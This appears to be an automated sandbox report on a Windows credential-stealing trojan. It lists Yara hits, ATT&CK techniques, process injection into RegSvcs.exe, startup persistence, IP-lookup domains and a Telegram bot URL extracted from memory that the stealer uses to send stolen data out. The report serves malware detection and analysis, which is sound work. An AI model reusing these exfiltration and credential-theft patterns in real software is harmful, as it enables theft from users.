                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296227369.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3296052584.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01046283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01046283
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01046747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01046747
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00666283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00666283
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00666747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00666747
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  2
                  Valid Accounts
                  13
                  Native API
                  111
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts
                  2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS137
                  System Information Discovery
                  Distributed Component Object Model121
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets341
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  1
                  Masquerading
                  Cached Domain Credentials2
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576075 Sample: ref_97024130865.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 checkip.dyndns.org 2->32 34 checkip.dyndns.com 2->34 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 48 12 other signatures 2->48 8 ref_97024130865.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 46 Tries to detect the country of the analysis system (by using the IP) 30->46 process4 file5 26 C:\Users\user\AppData\...\nonplacental.exe, PE32 8->26 dropped 54 Binary is likely a compiled AutoIt script file 8->54 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->56 14 nonplacental.exe 3 8->14         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->58 18 nonplacental.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\nonplacental.vbs, data 14->28 dropped 60 Multi AV Scanner detection for dropped file 14->60 62 Binary is likely a compiled AutoIt script file 14->62 64 Machine Learning detection for dropped file 14->64 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->66 68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 193.122.130.0, 49704, 49706, 80 ORACLE-BMC-31898US United States 20->36 38 reallyfreegeoip.org 104.21.67.152, 443, 49705, 49709 CLOUDFLARENETUS United States 20->38 50 Tries to steal Mail credentials (via file / registry access) 24->50 52 Tries to harvest and steal browser information (history, passwords, etc) 24->52 signatures12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  ref_97024130865.exe74%ReversingLabsWin32.Trojan.AutoitInject
                  ref_97024130865.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\juvenile\nonplacental.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\juvenile\nonplacental.exe74%ReversingLabsWin32.Trojan.AutoitInject
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.3296052584.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.comRegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.org/qRegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.3296052584.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.67.152
                                              reallyfreegeoip.orgUnited States
                                              13335CLOUDFLARENETUSfalse
                                              193.122.130.0
                                              checkip.dyndns.comUnited States
                                              31898ORACLE-BMC-31898USfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1576075
                                              Start date and time:2024-12-16 14:10:38 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 24s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:ref_97024130865.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 63
                                              • Number of non-executed functions: 273
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: ref_97024130865.exe
                                              TimeTypeDescription
                                              14:11:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.67.152CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                    SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  193.122.130.0TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                  • checkip.dyndns.org/
                                                                  AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  checkip.dyndns.comCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 158.101.44.242
                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                  • 193.122.130.0
                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  reallyfreegeoip.orgCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 104.21.67.152
                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                  • 172.64.41.3
                                                                  54FApnc7eR.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.177.250
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 104.26.13.205
                                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
